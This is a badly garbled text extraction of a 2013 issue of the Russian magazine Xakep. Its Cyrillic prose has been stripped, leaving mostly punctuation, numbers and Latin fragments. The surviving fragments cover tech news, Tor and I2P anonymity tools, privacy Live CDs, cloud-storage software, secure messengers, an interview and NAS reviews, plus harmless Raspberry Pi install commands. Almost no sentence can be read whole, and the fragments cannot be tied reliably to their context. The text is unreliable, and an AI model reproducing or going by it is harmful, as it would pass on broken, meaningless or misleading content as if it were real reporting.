Вы находитесь на странице: 1из 143

ANDROID 56

09(176) 2013

OLLYDBG

WWW.XAKEP.RU

,
-

: 290 .

12+

14

?
, ,
,

106

78

LINUX

Apache
-


MySQL

step (step@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
(ilembitov@real.xakep.ru)
(rusanen@real.xakep.ru)


PC ZONE UNITS
X-MOBILE PHREAKING

(ilembitov@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
(goltsev@real.xakep.ru)
ant (ant@real.xakep.ru)
(evdokimovds@gmail.com)
Andrushock (andrushock@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)

X-TOOLS
UNIXOID SYN/ACK
MALWARE
ART
, ,
, . ,
- . , ,
- . ,
, ,

. -

? ! ,

. ,
.
: XXI , , ,
, ! VPN,
, , whole
disk encryption , ,
, I2P, TOR,

! , 2013 ,

- .
,
!
Dr. Klouniz
][,
lozovsky@real.xakep.ru




DVD


Unix-
Security-

PR-

ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)

(grigorieva@glc.ru)

shop.glc.ru, info@glc.ru




, .

46617
24231
46617

.: +7(495)935-7034;
8(800)200-3-999
, -,

(lapina@glc.ru)

, ! Xakep #08(175) (tregubenko_v_v@tut.by).

: 101000, , , / 652, . DVD-: claim@


glc.ru. : , 119146, . , 1- ., . 5. .: (495) 934-70-34, : (495) 545-09-06. : , 125367, . , , . 10, 1. , 77-50333 21 2012. Scanweb, . 190 000 .
. . ,
, .
. .
: content@glc.ru. , , 2013

14
?
, ,
. ?

NAS
35

,
-

- , , : I do my best. - , ,
, ,

176
MEGANEWS

12

? ! ,

PROOF-OF-CONCEPT

13

14

16

20

Live CD

22

26

30

aka Bobuk'

NAS4FUN

35

NAS

ASUS PQ321QE

40

4K- ASUS

41

44

48

ARM

52

56

Android

62

, , Android

EASY HACK

68

72

76

78

MySQL

82

Cuckoo Sandbox

88

Blackhole exploit kit

90

94

X-TOOLS

98

100

][-: , 2000 !

LINUX

106

Linux/Cdorked.A

109

XXI

112

WebRTC +

118

120

126

Linux-

130

134

HP ProLiant N54L G7 MicroServer:

FAQ UNITED

140

143

8,5

WWW2

144

web-

MEGANEWS

Mifrill

mifrill@real.xakep.ru

ANDROID 4.3,
?
GOOGLE

ndroid 4.3 Google, . , Android:


2.0 2.3
.
:
Project Butter ( ), TRIM (
-) Bluetooth Smart.
Gmail, Google
Calendar . ,
Google Play,
Android 2.2. , - ? , .
: (, -

).
.
SELinux
Android 4.2,
.
, , , , , .
,
.
: ,
root- Android 4.3
, .

,
,
.
.

SELinux
Android 4.2,

, Google
Find
My iPhone iOS.

Android Device Manager



.
,


.

09 /176/ 2013

MEGANEWS

HTTPS
30
Black Hat,
-, ,
HTTPS.
BREACH,
(, cookie CSRF-),
HTTPS-. ,
, , -

TLS SSL. CRIME (Compression
Ratio Info-leak Made Easy), .
JavaScript-.
,
JavaScript- , . ,
CSRF- 30 . 95%.

BITTORRENT
500


,
. ,
. , .
, MentaL, .
BitTorrent. , ,
.
BitTorrent Inc. .
, , . MentaL ,
, 500 .
, , , ( - ) -
! : bit.
ly/1cxzzue.

Mail.ru
,
Google.
mail.ru
39,5 .

BitTorrent
-
BitTorrent Sync


,
.


Microsoft.

Google ,
IE 11. , .

Bitcoin .


.

cookie
, .
Netflix,
Twitter, Vimeo .

MEGANEWS

09 /176/ 2013

VPN



, VPN ,
. MasterCard Visa
VPN- (
). VPN- iPredator, The Pirate Bay .
Payson ,
, Visa MasterCard. Annonine,
Mullvad, VPNTunnel, PrivatVPN.
, ,
, , ,
. ,
- , .

900

,
PayPal,
.
,

Bitcoin, ,
BC .

MICROSOFT

, ,
Surface RT
900 .
,
.
Microsoft
11,4%.


rbth.ru. , 92%
,
. ,

12%. ,
70%
.

Oculus, Oculus Rift,
CTO. id Software
.

ESET : 60%
. 25%
.

09 /176/ 2013

MEGANEWS

GOOGLE-

01

NEXUS 7 GOOGLE CHROMECAST


Android, Google
, Chromecast
.
, Google , Nexus 7.
Android 4.3, .
- , : 1920 1080
, - Full HD. , , . 5 ,
Nexus 7. , . , Snapdragon S4
Pro 2 . Nexus 7 : 16
32 ,

Wi-Fi, Wi-Fi + LTE.
: 229 349
.
Nexus 7 ,
Google Chromecast .
, , ?
(12 12 )
HDMI- -,
, . ,
/ Chromecast ,

Android iOS Chrome. AirPlay, ? , , DIAL-, YouTube Netflix (
, ,
-). Chromecast,
YouTube Wi-Fi ,
. , - . -, Chromecast , HDMI . USB-
, ( ). -,
: YouTube, Netflix Google Play. . Chromecast 35 .

Chromecast
: YouTube,
Netix Google Play.

GOOGLE

Bluebox
Android, 900
. APK,
. ,
,
.

02



, . ,
HBO Google , VLC Media Player. , ,
HBO, , .

03

Nexus 7 10% Android


. Google , .

.
,
160
. SQL-.

MEGANEWS

09 /176/ 2013

SIM-

01

SIM
, , , , 2009
GSM,
. SIM-.
Black Hat . , 2011 Security Research Lab
OTA (over-the-air, , SMS). SIM-, SIM ,
, RAM, ROM, ,
, . , , , , . SIM-
, Java. SIM- ,
Java Card. Java Card , .
, Java Card , Data Encryption Standards (DES),
70- !
, . Security Research Lab
: SMS, SIM OTA-.

, , ,

SMS.
56- DES .

SMS
, ,
, ,
SMS .



.
, .
SIM-. , IMSIcatcher,
.

02

,

SIM-


LibreOffice 4.1 Open Office
4.0, .
. , LibreOffice
. Open Office
.

03



SIM-,
.
:
.

,
750

.
SMS
.

? ?

Google , .
SSL-
70,2% Chrome. 15,1% .

09 /176/ 2013

MEGANEWS



-
lack hat
. ,
,
20 , . , ... .
, ,
.
Bitcoin , , Tor
.onion. ,
12 (10 + 2 ) 1,6532 BC
. , , .
. , ,
. , ,
, .

Vice
,


,

,


.

Firefox
23,
:
(, HTTPS,
HTTP-).

Adobe .


40%.

APPLE DEV
CENTER

Apple, -
. , ,
Apple Dev Center techcrunch.com.
,
. Apple 13 ,
. Apple, .
, .
Apple , ( !). ,
,
.

Apple
13
,


CERT-GIB
896 ,
. 86%
.

, ,
Joomla WordPress,

Trojan.WPCracker.1,
.

10

MEGANEWS

09 /176/ 2013

MOTOROLA
,
Motorola ,
- .
Moto X , Motorola
:).
, :
4,7 720p, Motorola
X8 (1,7 ), Adreno 320 GPU L-NLP CCP,
, .
2 16 32 -. ,
, Motorola , . ,
, ,
. 575 629
16 32 - .

3 4

,
Moto X
.
Ok, Google
Now


. , ,

.


GOOGLE
Google
7,32%
926,47 . , Google
304 , 50
.
, Google

.

116



-


, Burning Glass
Technologies.
2040 -,
.
:
116
, 55,77 .

Facebook
.
329 ,
13 .

DEF CON .
: youtu.be/rVwaIe6CiHw.

09 /176/ 2013

MEGANEWS

,
,

11

01

BOOTSTRAP 3
Bootstrap (blog.getbootstrap.
com) CSS-. , ,
- -.
Bootstrap , , .
.
, navbar, Bootstrap .
, , , lightweight-. RC1 , , Bootstrap ,
.
Bootstrap . -, Bootstrap
IE 7 FF 3.6.
,
, . -, mobile first. Bootstrap .
span .col-* , .col-sm-* . ,
2.x, CSS- JS- . , CDN,
, .
. , ,
,
. 3.x
, .



46 ,
.
,
. .

02

3D-
3D-
Kickstarter
3D-.
Fuel3D 990 ( ). ,
, .

03

300
Bootstrap , Metro . . , ?
Microsoft , ?

Sony Panasonic
. 2015
300
. , ,
CD, DVD Blu-ray.

12

Header

09 /176/ 2013

? !
,
, -, . ,
, -
. top secret
. ,
.

, , - .
, : , !
: .
,
- : ? (
,
.)

,
. . - .
,
.
Website down,
http://dvd.xakep.
ru ( , DVD- ) .
, .

mqukisbx@sharklasers.com. ,
email, .
,
,
SMTP.
- Gmail ,
. , , ,
, ( ,
, ,
, ,
). .
, .
,
( SMTP). IP- . ,
, ,
. , , ,
? ?! .

, .
. ,
,
. :
1.
Mac ,
, . OS X?
, , , , , -
.
2. , ,
, SMTP.
!
3. . WTF?



Google (, , Gmail

), - .
:
(
Wi-Fi , , , ), 3G ,
99,99% ( iPad
Mini) . .

!
, ?
, ,
!
. , - . ?
100% ,
. .
, Google,
.

,
.

, (,
)
. ?
?

, .
. dvd.xakep.ru,

. , - .
. , ,
, - ?
- Google
App Engine, ...
Google Docs , , mqukisbx@sharklasers.
com.
. !
Google Docs Is My Site
Down Digital Inspiration. -
Google
Docs (- VBA Excel) ,
Proof-of-concept.
,
- Google Docs
(bit.ly/HYQdju),
. (UrlFetchApp)
(MailApp.sendEmail).
( dvd.
xakep.ru), .
-
,
:).
, , APT
, , . .
P. S. - .
. , . ?
,
Google.




Google Docs!

09 /176/ 2013

Header

13

Proof-of-Concept


2013 Google
Loon (google.com/loon), - Google X.
Loon
20 . ,

,
830 /.

.
,
Google . ,
100 ,
. 20 , , .



.
. Google
.
, , 3G.

Google
,
.
40 .


(15- ,

. 1.

. 2. : (), ( ) ()

) ,

10 (. 1).
,

.
,
. 100 .
ISM, 2,4 5,8 .
(. 3). Wi-Fi, .
30
40-

. ,
,
, .
.
.
, .

. Google . 40-
300 ,
,
, .

. 3. Google
Loon

. 4. ,

. 5.

14

COVERSTORY

09 /176/ 2013

Dr. Anonymous

15
,
, ,
,
,
. ,
, , ,
! , ,
,

. !
, - ? privacy,
, ,
?
.
Pentium 166 16 .
, ! ,
CD-ROM
Sound Blaster 16 . 33,6
FTN-, BBS
. Internet Explorer 4.0
,



19951998 .

? , www.iproxy.com ,
cookie .
, ? FedWorld Information Network (www.
fedworld.gov)
, .


, 1997

,
, .
-
, 11
1998, . ,



, . , , ,
, 21-

[NetserpNT //RUC]
, .
! , 20
1994 ,

.
-
, www ,
IRC, ICQ
Microsoft Windows
, ,
95
dialup-
1998
.
...
IP
10 ,
, . , ,

.

IP-, , .
, , .

1994 (
INFECTED VOICE, )
: -148, / 10 Stealth
( , , . . .).

1997 (
INFECTED VOICE, )
email-,

Internet. PGP.
PGP ,
email, . ,
, , , ,
/
10. (
PGP, 2.6.i for DOS
1024 (
). PGP ,
,
. 1997
! ? . .)
. , -
? -

IRC-.
, , IP-p IRC ,
. H y p : IP spoofing
p-pp, p IRCp. , IP spoofing ( IP), . p
p Windows
95 p Winsock 2.0
pp p.
Microsoft Outlook Express 4.0 ,
p - p, y
y, p p .
y p py y
(y , pp
pp Kremlin 2.1) .
yy , pp,
, pp, p Windows, ,
p p ( ,
p), p

09 /176/ 2013

p pp (-
Google Chrome, Chrome OS? ,
? . .).
H , FTP- p
p pp. y
!

,
,
( ) .
p , ppy
( p),
p .
py
pp . p .
p . p p
p , p
p p, p y, p yy p y.
p p y.

15

p pp ,
. p
pp aka BBS,
pp ;). p ! H
100%. login, password.
Windows 98, , .

Microsoft.

(?) Windows 98.
,

( ,
! . .).

1996
y p
p ,
, p . y
p (. 43/96),
pp
p y
yy -pypy
p -p.
Remailer ,
p
y p
p,
p y ,
.
pp, py
remailer@replay.com, y Subject:
remailer-help.
pyp
pp :
p p ( p);
py pp;
p (, p, p
. .) p
p;

p
py . .
, (
p
)
p
p
p , p p p
p.
p-pp
. pp p
p : http://www.tamos.com/bin/proxy.cgi.
y Proxy server is
detected! p py.

1997 BY MIKE SMITH


Hp -.
pppp , -

DISCLAMER
,
, .
. ,
,
( ,
).

(Microsoft)
(
, Windows 98)
, , ( , , . .) ,
, ,
.

,

Windows!
,
.

Windows.

,
, 1996
:

, . ,
- . ,
.
AWARD BIOS
AWARD_
SW Paradox Borland
International, jIGGAe nx66ppx.
(,

) ,

,

CLIPPER,
,

.


,
, good!password. ,
, -
( 10 000 ,
10 32 ,
Pentium 10 000 crypt/) := 210 000
, 2,5 !

, WEB@HACKZONE.RU
ICQ (http://www.icq.com)
. Fyodors Exploit world
ICQ , ,
ICQ . , , ICQ
Snoofer Team , ICQ
UIN. Snoofer , ,
, . IP- , , ICQ, UIN .
.

COVERSTORY

16

09 /176/ 2013

ant
ant@real.xakep.ru


,
, . ,
. ,
PRISM
, .

TOR


.
.
, ,
?
: Microsoft (Hotmail), Google
(Google Mail), Yahoo!, Facebook, YouTube, Skype,
AOL, Apple. , PRISM
, 1,7 ,
,
.

PRISM
: ,
Tor. , ,
,
.
,
. .
Tor, ,
,
. .

Tor -

Privoxy
, HTTP-
-, .

, GUI- Vidalia,
.
,
Tor, Vidalia portable Firefox security-.
TorChat. , TCP/
IP- DNS-
Tor Tortilla.
Windows
,
SOCKS HTTP-,
Windows. , Tor + Vidalia + Privoxy Advanced Onion Router
(bit.ly/ancXHz), portable-
. , , Live CD ,
Tor, bit.ly/e1siH6.
Tor -

09 /176/ 2013

. ,
.

I2P
,
, I2P. Tor I2P
. Tor ,
, I2P

.
.
, ()
.
, ,
.
,
,
, , .
I2P, Tor, ,
,
-, I2P eepsites.
I2P
Java. -,
127.0.0.1:7657.

, , .
I2P,
.i2p. , - 127.0.0.1:4444. I2P

Tor Vidalia

17

( outproxy). ,
.
,
. I2P-? , 100%-
,
,
.

GNUNET
?
GNUnet (bit.ly/hMnQsu)
P2P-,
. ,
.
, .
, , , .
URI,
gnunet://module/identifier, module
, identifier ,
.
: ( )
( ).

ECRS (An Encoding for Censorship-Resistant
Sharing ). GNUnet ,
P2P-. ( ), : ,

I2P

OBFSPROXY
,
,
Tor,
DPI (deep packet inspection),
,
.
, torproject obfsproxy (bit.
ly/z4huoD),
,
.

obfsproxy

, DNS. ,
: ,

(
).
.

RESTROSHARE
RestroShare (bit.ly/cndPfx) F2F (Friend
To Friend), GPG. ,
, - darknet.

18


RetroShare
GPG- ( ).

SSH-, OpenSSL.
( ),
. :).
.
: , , ( , ), (VoIP-), IRC.

GNUnet

RASPBERRY PI

F2F-

: Raspberry
Pi? . ,
. /,
Tor/I2P- VPN.
, .
,
. , I2P

, ,
.
, 30
.
,

- .
,
I2P, Java,
. Java-
256 . Raspberry Pi model
B, 512 ,
. , . ,
Raspbian (bit.ly/ys8SAK).
:

clientApp.0.args=7657 ::1,127.0.0.1
./webapps/

sudo apt-get update; sudo apt-get


dist-upgrade

clientApp.0.args=7657 0.0.0.0
./webapps/

Java,
, ,
ARM, bit.ly/13Kh9TN ( , ).
:

i2ptunnel.config

sudo tar zxvf jdk-8-ea-b97linux-arm-vfp-hflt-03_jul_2013.tar.gz


-C /usr/local/java
export PATH=$PATH:/usr/local/java/bin

0.0.0.0. I2P, :

Pi VPN ( ,
bit.ly/11Rnx8V) Tor ( : bit.ly/12RjOU9).
, .

MIKROTIK

tunnel.0.interface=127.0.0.1
tunnel.6.interface=127.0.0.1

cd ~/i2pbin
./runplain.sh

I2P:

cd ~
mkdir i2pbin
cd i2pbin
wget http://mirror.i2p2.de/
i2pinstall_0.9.7.jar
java -jar i2pinstall_0.9.7.jar -console
Raspberry I2P,
. ~/.i2p
clients.config.

crontab
, :

0 * * * * /home/pi/i2pbin/runplain.sh
@reboot /home/pi/i2pbin/runplain.sh
. SSH.
I2P, 22- .

Raspberry Pi
, . MikroTik (bit.ly/mcyQK),

.
, .
RouterOS
Linux, MikroTik
RouterBOARD.
RouterBOARD : .
,

PoE. (bit.ly/jSN4FL),
,
security- RouterBOARD4xx, Tor.
, : bit.ly/1cmX6xU .

09 /176/ 2013




,
.
. ,
, ,
(
, ).

.
,
, , .
- .

Disconnect

,

.
Firefox, Opera Chrome,

Adblock Plus (bit.ly/19WLfF9).

, ,
Firefox,
Chrome, Opera Safari. (bit.ly/16bI6vW)

, ,
.
,

(),
,
( , , , )

.

.


Disconnect, ,
DoNotTrackMe (bit.
ly/yUj0ty).
. ,

, DoNotTrackMe
.
,
, .

Adblock Plus

Ghostery

(
)
. , , -

, ,

.
.
, -

IE. ,
, .
(bit.
ly/PZk).

VPN
DoNotTrackMe




Tor MikroTik

MikroTik
RouterBOARD
RB411AR


, -
. ,
. ...
, , 100%-
. , , Tor, I2P -
, .

,

VPN. ,
VPN-
Amazon (bit.ly/16E8nmJ),

OpenVPN (bit.
ly/14FHItM).

.
, VPN .
-, ,

VPN-, -, , PPTP,


(
VPN, ][ 170).

.

20

COVERSTORY

09 /176/ 2013

LIVE CD,



Linux ,
, -
.

,
Live CD / Live USB. ,

.


rommanio@yandex.ru

, , :
Tor ;
I2P ;
IM-.
Hardened Gentoo,

, PaX, .

TAILS

LIBERT LINUX

TIN HAT

https://tails.boum.org

dee.su

opensource.dyc.edu/tinhat

: Tails
: GNU GPL
: PC USB/DVD, 1
:

: Maxim Kammerer
: GNU GPL
: PC USB/DVD, 1
:

: DYouville College
: GNU GPL
: PC USB/DVD, 4
:

Tails The Amnesic Incognito


Live System, Incognito Linux,
Debian.
0.19:
3.9.1;
GNOME 2;
Tor/I2P;
SSL , Tor,
Unsafe Web Browser.

Libert Gentoo, ,
Hardened-. , . :
3.4.7;
LXDE/Openbox;
Tor;
Florence.


Windows XP.
, , , - .

.

, I2P . Cables
communication,
.
, , Claws-Mail.
, Tails, . ,
, Tails .

,
Hardened Gentoo
, ,
tmpfs, . DVD, Live-

, ( ),
. ,
, ,
.
, loop-aes,
( , NSA, , ).
Tin Hat ,
.

9/10

9/10

8/10

8/10

7/10

8/10

10/10

10/10

10/10

09 /176/ 2013

21
. , . , FreedomBox
,
.
. , , -

FREEDOMBOX
freedomboxfoundation.org
: FreedomBox Foundation
: GNU GPL
: Plug-
(, Raspberry Pi)
:

.
-,
. - , , , ,

DreamPlug ,
FreedomBox

8/10

6/10

5/10

: LPS .
, -

WHONIX

JONDO LIVE-CD/DVD

LIPOSE (LPS)

sourceforge.net/projects/whonix

bit.ly/UpSh9Y

spi.dod.mil/lipose.htm

: whonix.org
: GNU GPL
: PC VirtualBox,
2 , 10
:

: JonDos GmbH
: GNU GPL
: PC c DVD/USB, 1
:

: US DoD
:
: PC USB/DVD, 1
:

Live- Debian
(, Gentoo) Xfce.
:
JonDonym, Tor. - , .
Tor .
MixMaster , email.
: , remailer;
.


. . :
LPS-Public Firefox Flash, Java
- (CAC PIY)
;
LPS-Public Deluxe LibreOffice Adobe
Reader ;
LPS-Remote Access . ,
VPN-.

Whonix : WhonixGateway Whonix-Workstation.


,
. , IP Skype/
Thunderbird/Flash-,
, IP . Windows
, , ;
Whonix-Workstation.
Debian, , .
KDE.

Live DVD ,
LibreOffice, Gimp .

. , -.

9/10

9/10

7/10

9/10

8/10

8/10

7/10

7/10

8/10

22

COVERSTORY

09 /176/ 2013


SYN/ACK

NFS, SMB/CIFS, FTP


, Dropbox.
,
.

,
.


grinder@synack.ru

09 /176/ 2013

23

OWNCLOUD
, , .
Dropbox,
, , ( ), TODO . , .
( Git,

),
.
, -.
PDF- ODF-, , .
-.
, , remoteStorage.
, Apache Lucene,
, .
, ,
. (apps.owncloud.com).
,
( ClamAV),
,
, - .
OpenID LDAP, Dropbox, Swift, FTP, SFTP, Google
Docs, S3 WebDAV.
ownCloud (
/Shared), ( ).
KDE (Open Collaboration Services
API, KDE).
- WebDAV, KDE
KIO-Slaves,
. ,
. ownCloud Desktop Client Mobile
Clients,
Windows, Linux OS X Android (
) iOS (iPhone/iPad/iPod). , App Store, ownCloud
. ,
Dolphin, Nautilus, Finder Explorer
ownCloud.

ownCloud

, , ,
Dropbox SkyDrive . , .
,
TrueCrypt (truecrypt.org), .
:
Viivo (viivo.com) ( SecretSync)
Dropbox.
, , , (AES-256) Dropbox.
.
Windows, OS X, iOS Android.
Boxcryptor (boxcryptor.com) , Dropbox,
Google Drive Microsoft SkyDrive, SugarSync , WebDAV, AES-256.
Windows, OS X, iOS Android. Free
( ) .
CryptSync (stefanstools.sf.net/CryptSync.html) Dropbox,
Google Drive, SkyDrive . Windows.
GNU GPL.

ownCloud
, .
,
.
ownCloud PHP JavaScript,
SQLite, MySQL PostgreSQL. LAMP- WAMP-,
.
,
ownCloud
( PHP- ,
). .

ownCloud

COVERSTORY

24

AjaXplorer

AJAXPLORER
AjaXplorer (ajaxplorer.info) ,
-,
-,
-, iOS- Android- WebDAV.
-,
. (, , PDF,
).
. . , .
- ( ), . (, ), (
), . .
, . .
AjaXplorer
.
Active Directory /
LDAP, HTTP, CAS, FTP, OTP . , , , .
.
HTTPS
EncFS.
2013 (sysdream.com) AjaXplorer,

09 /176/ 2013

, , .
(Bridges),
AjaXplorer CMS, PHP, Drupal,
WordPress Joomla. API,
. AjaXplorer for Filelink (goo.gl/
S8PlO6) Mozilla Thunderbird AjaXplorer.
. ,
( , FTP, SFTP, Samba, Amazon S3, Dropbox, HPCloud, IMAP,
POP ), .
( - Zoho),
, Exif-,
- .
,
. ,
,
server/conf/conf.access.fs.inc.

AjaXplorer, ajaxplorer.info/
plugins. ,
, .
Apache Lucene.
AjaXplorer HTML, PHP, Ajax
JavaScript.
, .

AjaXplorer , CMS, PHP, Drupal, WordPress Joomla.


API, .

09 /176/ 2013

25

SEAFILE
Seafile (seafile.com).
2012 , 1.3
, . Seafile ,
.
( , ) ,
.
.
.
.

( ), HTTPS. ( 60 ,
, ),
, , ( ).
, , , Wiki.
,
.
-,
Seafile (Windows, Linux, OS X, Android
iOS).
Python
GPLv3,
SQLite. Community Edition Linux Raspberry Pi, Windows -

150 . Pro Edition : WebDAV, ,


email ( : bit.ly/1cMiZVe). ,
(
1 ).

Seafile
,

,
. AjaXplorer ownCloud
, Seafile
, .

-
, , Apple iCloud, Ubuntu One, Microsoft SkyDrive. , , . ,
, . ,
, :
Wuala (wuala.com)
(Windows, Linux, Android, iOS, Java -), .
, ,
. AES-256 , RSA-2048 ,
SHA-256 ; SSL. .
, . , , ( ).
.
. 5 ,
1 .
SpiderOak (spideroak.com) , 2007 , Wuala. 2 , 100 . Windows, Linux, iOS, Android N900
( BlackBerry Windows Phone), -. Enterprise-
, SSO AD/LDAP,
. AES-256/RSA-2048. SSL.
Tresorit (tresorit.com) , 5 (
50 ), (AES-256/SHA-512),
Windows, iOS Android. - . .
Mega (mega.co.nz) ,
50 , $$$ 4 . (AES-128) JavaScript ( HTML5 API
WebCrypto). C SSL.
, ,
/ . ,
.

Mega.co.nz 50 ,

Wuala

26

COVERSTORY

09 /176/ 2013

09 /176/ 2013

27

yurembo
yazevsoft@gmail.com


. , , . Jabber, .
, , - -
.

OTR (Off-the-Record).
AES, , - SHA-1.
OTR
, .
.
. , IM-,
.
Cryptocat; -
, JS. Chrome, Firefox Safari. , , OS X.
.
AES-256 . .
,
. , - Whirlpool,
HMAC-WHIRLPOOL.
Cryptocat , .
30 ,
SSL-.
Bitmessage, . Bitmessage P2P- / .
, - . , ,
P2P- Bitcoin, . Bitmessage ,

:

, ( Tor). ,
.
, ,
TorChat. TorChat

.
, , . TorChat
Tor, .
Tor, TorChat, ,
, .
Tor RSA. TorChat
, OS X, ,
Objective C. 2012 jTorChat,
Java.
TorChar, .

INFO


,

,


(https://heml.is).


lavabit.com,
. ,
.
Lavabit ( self-hosted ),
- VFEmail
(https://vfemail.net).
. , .
,
SpamAssassin. VFEmail POP, IMAP, SMTP, - SSL-.
, VFEmail
Microsoft Office . . , ,
, 50 . , .

28

COVERSTORY


,
? Skype
Microsoft, ( ) .
. Tox (tox.im) Skype.
Skype P2P
,
.
,
, .
IM- .

,
. - (DHT),
BitTorrent.
UDP
(Lossless UDP).

09 /176/ 2013

Hemlis


,
.
,
/ . (
),
(
).
Tox GPLv3. Linux, Windows
OS X. libsodium.
, ,
ncurses, Qt5.
, GNU
GNU Free Call.
. GNU Free
Call SIP,
VoIP- GNU SIP Witch.


,
.
:
, ,
.
,
, . ,
!
- .
.

,

. ,
, 15-
, ,
. ,
,
.
Friendica (friendica.
com). 2011
. Friendica ,
GitHub. :
(Facebook, Twitter), (Diaspora,
Identi.ca). , Friendica

Friendica ,

09 /176/ 2013

29


-
.
:
,
, /,
P2P- mesh-,
.
VoIP-,
Skype .
GNU SIP
Witch, SIP-, VoIP-,

mesh-.
VoIP- ,
SIP-
.

Diaspora

Tox
Skype

c GNU Free Call


.
, .

, - .
: , ,
/, . ,
( ) . !
!

RSS. Friendica ,

(, ,
) .
Red
( ).
, Friendica
,
.
,
,
Diaspora (https://joindiaspora.com).

.
, -, , Diaspora,
, . ,
(pod) ,
. ,
, , ?
. ,
, ,
, ,
.
, .

30

08 /175/ 2013


AKA BOBUK

09 /176/ 2013

31

- -, . -
. - GitHub. -, , , ,
. : , , -
. . . .

- , , : I do my best.
, , , . ,
. - , , ,
, .
,
.
, , .
56 ,
.
, . ,
, .
,
.
,
, :
. , .

. , :
, . .
, ,

. , , ...
, .
.
, . . , ?
, , ,
, . .
... .
- ? .
, , ,
.

Cassandra? ?.
Cassandra,
open source.
, , ,
Cassandra, , .
: , , , ,
. .
, , , . , , , ,
. - ,
, . ,
Windows Phone , , - . , ,
, .
, , . ,
.
, - .
,
, .
Yet another Conference (YaC). ,
.
, . ,
500
, . - Prismatic, .
, . , ,
, , , . , , ,
, .



, . ,
- .
, .

. ,
, ,
, . .
, . , .
, , . - .
, , ,
. ,
- :


. : , . , . !.
- , , .
, , : , . .

2006
-.


,
, .
: 24 .
:

.
. ,
6,6
,

.
,

.

>350

-
.
2006 .

- ?
. ,
, ,

32

. .
team lead ,
. , . ,
.
, .
.

, .
user
experience. , , .
,
.
( . . .),
. ,
. , ,
.
. -
,
(
hi-tech ),
,
,
2006 .
,

,
350 .


.
300 ,

2000
. .
.
,
,

, .
,


.

. , ,
.

,
.
.

- . , , . , ,
- .
.
, - . . ,
.


, , ,
. , , . , , .
, , ,
, !
.
, .

,
.
,

.
,


.

. ,
.


,
. ,
,

,


.

.
,

,


,
.
,

,
.

.

09 /176/ 2013

YAC13

.
.

, .
YaC (Yet
, another Conference).

2013-
,
. -
,
,

,
, ,


, , , .
.
,
IT (big data)
: bootloader.

(big maths). Spectrum,

events.yandex.ru.
. ,

,
. , 100% warez, .
, ,
.
,
, , . . ,
bootloader , .
, , :
.
,
, , .
.
, . ,
ASPLinux ( SWSoft, Parallels), - ,
.
, IT . , IT
. :
,
.
,
IT. - 1015 . , , .

?
:
. . , . , .
, . (
, ), . ,
, .

- , , . . , .
, , ,
. -
.
, .
,
. , , ,
.
.
,
.
.

. ,
:

IT . : ,

>500 000

-.

2000

.

34

, (

) .
,
, - . ,
-
.
,
, - .
,
. ,
.

-
, .
, - .
:
? ,
- .
:
!
- .
.
. ,
, ,
.
,
.
, , .
, .
, . : , ! , , - ,
, , , ,
, .
. - , , . ?
, - . , (
). : - .
, , . , ,
. , ,
- ?.
Skype. .
.

-
, .
,
, ... .
,
.
.
... , , CDN,
.
-, , ,
.
, ,
, . . , , , , .
. ,
.
.
- ,
, . ,
, , ,
, . , .

- .
, ,
. ,
,

>5000


,

.

09 /176/ 2013

NAS effect

35

NAS4FUN
NAS
NAS-
. .
,
!

NAS
Intel NAS Performance Toolkit (Intel NASPT). :


HD-.
,
RAID 0. RAID 5, , ,

.

: , ,
NAS.
,
.

Ferrum

36

32 000
.

+

,
USB 3.0


-
Boxee

09 /176/ 2013

01

ASUSTOR AS-604T

AS-604T ,
.
, .
USB 3.0
,
.



,
HDD.
IP-

, .
AS-604T I/O-
- :
RJ-45, USB ( ),
eSATA HDMI. NAS
( AS-604T Boxee).
(
AS-604T ) 120- . 4- , .
.

. Control Center.
ID.
.
- AS-604T ADM (ASUSTOR Data Master)
. ,
. , ,
. .
90. , 2011 !
, ASUSTOR , .
. ADM .

20 500
.

02

BUFFALO LINKSTATION
PRO QUAD

NAS
LS-QV4.0TL/R5-EU, , .
LS-QV8.0TL/R5-EU

LS-QV12TL/R5-EU

8 12
.
. USB 3.0
, Marvell

RAID 6
.
LinkStation Pro Quad
.
USB 2.0 ( Function). .
USB 2.0 Ethernet . NAS. Auto .
.
, , .
, , .
Western Digital WD10EARS Caviar
Green. RAID 5, , RAID 6.
- LinkStation Pro Quad, , . ,
. :
, /, , .
LinkStation Pro Quad
. EXE- ,
. LinkStation Pro Quad
, BitTorrent, Time Machine, iTunes, -,
NovaBACKUP WebAccess, .
Buffalo LinkStation Pro Quad . NAS, .

09 /176/ 2013

12 000
.

+
NAS
USB 3.0

NAS effect

37

03

NETGEAR
RND4000-200EUS

.


/ , RAID 6
,

USB 2.0 backup.


IP
. .
. : , HDD, .
. NAS ,
. , ,
USB 3.0 RJ-45.
.
ReadyNAS NV+ v2 Marvell
Armada XP, 1,6 . ,

. .
256 . NAS
: , SATA, PCI Express x4.
RAIDar Corrupt Root. NAS ,
.
RAIDar. RAID 5 , . ,
.
- RND4000-200EUS RAIDiator V5 . : clck.ru/8cuUs.
DVBLink, NAS , ReadyNAS
Surveillance, IP-, Egnyte
Cloud File Server ,
NAS (clck.ru/8cuaG).
ReadyNAS NV+ v2 , 2 4 .

35 000
.

+

NAS

04

QNAP
TS-469 PRO

TS-469 Pro Intel Atom D2700.


2133 , , (
Hyper-Threading). NAS
. ,
,

TS-469 Pro
. TS-469
Pro ,
3 . SO-DIMM.

( ) , Power USB 2.0
. LED .
, Status, LAN, USB, eSATA.
3,5-, 2,5- .
TS-469 Pro I/O - . . , .
. RJ-45, USB,
, , eSATA. NAS
: VGA HDMI , , . Kensington.
, TS-469 Pro .
. TurboNAS 3.8.
Windows 8. : qnap.ru/demo.
. 4.0.
. - TurboNAS 4.0
.
.
-. QNAP
HTPC.

Ferrum

38

09 /176/ 2013

16 000

25 000

+


DSM

05

SYNOLOGY
DISKSTATION DS413J

DS413j
:
, -,

- .
.
, USB 3.0
. DS413j

. , NAS


Apple.
: ,

.



, LAN Status. ,
.
, c, USB 2.0, RJ-45
. ,
USB 3.0, DS413.
DS413j , . 41 .
,
. .
, 3,5-,
2,5- .
DS413j .

-. Synology , DS413j .
DSM .
DS413j ,

. , , : -, - . , USB- HD-.

06

I/O

THECUS
N4800ECO

N4800Eco
N4800. NAS 20% .
CPU


. ,
IP
N4800Eco

.

N4800Eco .
PCI Express x1 (
) mini-PCI Express,
. , .
N4800Eco . . .
USB- .
. . NAS.
.
